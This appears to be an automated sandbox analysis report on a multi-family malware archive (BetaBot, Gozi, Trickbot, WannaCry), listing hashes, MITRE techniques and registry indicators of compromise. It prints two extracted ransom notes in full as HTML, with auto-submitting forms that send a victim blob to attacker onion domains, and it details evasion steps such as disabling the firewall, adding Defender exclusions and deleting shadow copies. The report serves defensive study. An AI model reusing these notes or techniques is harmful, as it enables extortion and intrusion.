betabot | a30d59af60ec2211948064f267544b37edddad284ce86c64120fb6ae545285cf

Resubmissions

15-11-2024 10:26

241115-mggzxsskat 1

12-11-2024 20:05

241112-ytvbkatkcm 10

Analysis

max time kernel
94s
max time network
163s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12-11-2024 20:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00310.7z
Size

7.1MB
MD5

c4343de80cf5b87860583ce70b74366b
SHA1

26c27c01db7260325fb02d5f1247d1ac8e200e45
SHA256

a30d59af60ec2211948064f267544b37edddad284ce86c64120fb6ae545285cf
SHA512

9564f0820f845a3ff578f362ae50909b4f87ea0c141b65c95727068361b29f851c4a218b2eb477df19d9d8d998dc44c2756e243d206ddc5490074986a563f9b0
SSDEEP

98304:uxi0fsp+sGzfyfoEdRKcAhCwN2HiN8/2dmAk1NSkGCFYLwKNtjNWemY/Go0TZLl9:uTf4KBhCLuqMmAkBkNMv/oKd9z5

Score

10^/10

betabot gozi trickbot wannacry backdoor banker botnet defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\[HOW_TO_DECRYPT_FILES].html

Ransom Note

<html> <head> <title>How can I recover my files?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key?</h3> <p> First, you'll need to synchronize your computer with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\IHCUXUI</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your computer and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your computer with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="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"> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/UPNECVIU_4DE097BFEB504D1C6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/UPNECVIU_4DE097BFEB504D1C6522DF69/">http://lockerrwhuaf2jjx.onion.sx/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/UPNECVIU_4DE097BFEB504D1C6522DF69/">http://lockerrwhuaf2jjx.onion.link/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/UPNECVIU_4DE097BFEB504D1C6522DF69/">https://lockerrwhuaf2jjx.onion.rip/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/UPNECVIU_4DE097BFEB504D1C6522DF69/">https://lockerrwhuaf2jjx.onion.to/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want to synchronize your computer now?')) { document.infection_form.submit(); } } </script> </html>

Extracted

Path

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\[HOW_TO_DECRYPT_FILES].html

Ransom Note

<html> <head> <title>How can I recover my files ?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files ?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean ?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files ?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key ?</h3> <p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\IHCUXUI</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="https://lockerrwhuaf2jjx.onion.rip" method="POST"> <input type="hidden" name="infection" value="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"> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/UPNECVIU_4DE097BFEB504D1C6522DF69/">http://lockerrwhuaf2jjx.onion.link/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.gq/UPNECVIU_4DE097BFEB504D1C6522DF69/">https://lockerrwhuaf2jjx.onion.gq/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/UPNECVIU_4DE097BFEB504D1C6522DF69/">https://lockerrwhuaf2jjx.onion.to/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.top/UPNECVIU_4DE097BFEB504D1C6522DF69/">https://lockerrwhuaf2jjx.onion.top/UPNECVIU_4DE097BFEB504D1C6522DF69/</a></li> </ol> </div> <div class="box"> <p> If you cannot access the site from any of the addresses above, you can follow the instructions below to access the site using the Tor Browser. </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar: <span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/UPNECVIU_4DE097BFEB504D1C6522DF69/</span></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } } </script> </html>

Signatures

BetaBot
Beta Bot is a Trojan that infects computers and disables Antivirus.
trojan backdoor botnet betabot
Betabot family
betabot
Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Gozi family
gozi

Modifies firewall policy service 3 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

explorer.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	explorer.exe

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

regasm.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	3208	regasm.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1432	6824	cmd.exe	172

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Trickbot family
trickbot

Trickbot x86 loader 4 IoCs

Detected Trickbot's x86 loader that unpacks the x86 payload.

Processes:

resource	yara_rule
behavioral1/memory/1388-132-0x0000000000400000-0x000000000042A000-memory.dmp	trickbot_loader32
behavioral1/memory/1388-143-0x0000000000400000-0x000000000042A000-memory.dmp	trickbot_loader32
behavioral1/memory/2580-277-0x0000000000400000-0x000000000042A000-memory.dmp	trickbot_loader32
behavioral1/memory/2580-237-0x0000000000400000-0x000000000042A000-memory.dmp	trickbot_loader32

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\TeamViewer\ = "0"	svchost.exe

Contacts a large (2258) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

Processes:

bcdedit.exebcdedit.exe

pid	Process
1192	bcdedit.exe
5476	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3740	powershell.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

explorer.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "mys.exe"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3eae57177e1k3w5.exe	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3eae57177e1k3w5.exe\DisableExceptionChainValidation	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	explorer.exe

Looks for VMWare Tools registry key 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exesemo.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	semo.exe

Looks for VMWare services registry key. 1 TTPs 23 IoCs

evasion

Virtualization/Sandbox Evasion

T1497

Processes:

